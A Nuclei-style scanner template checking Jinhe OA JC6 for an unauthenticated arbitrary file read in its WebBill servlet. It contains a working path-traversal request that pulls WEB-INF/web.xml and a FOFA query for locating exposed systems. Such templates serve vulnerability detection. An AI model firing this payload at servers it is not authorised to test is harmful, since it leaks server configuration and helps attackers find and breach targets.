http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <?xml version=
            - <web-app
            - </web-app
            - </context-param>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /jc6/servlet/WebBill?key=GetFileContent&pathfile=/../WEB-INF/web.xml HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
id: jinheOA-JC6-WebBill-File-reading
info:
    author: Superhero
    description: |-
        fofa: app="金和网络-金和OA" || body="/jc6/platform/sys/login"
        金和OA JC6 WebBill 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
    name: 金和OA JC6 WebBill 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/7NEJHCjlhrKbxzqw6YCtQg
    severity: high
    tags:
        - File reading
        - 金和oa
        - 金和网络-金和OA
        - Servlet
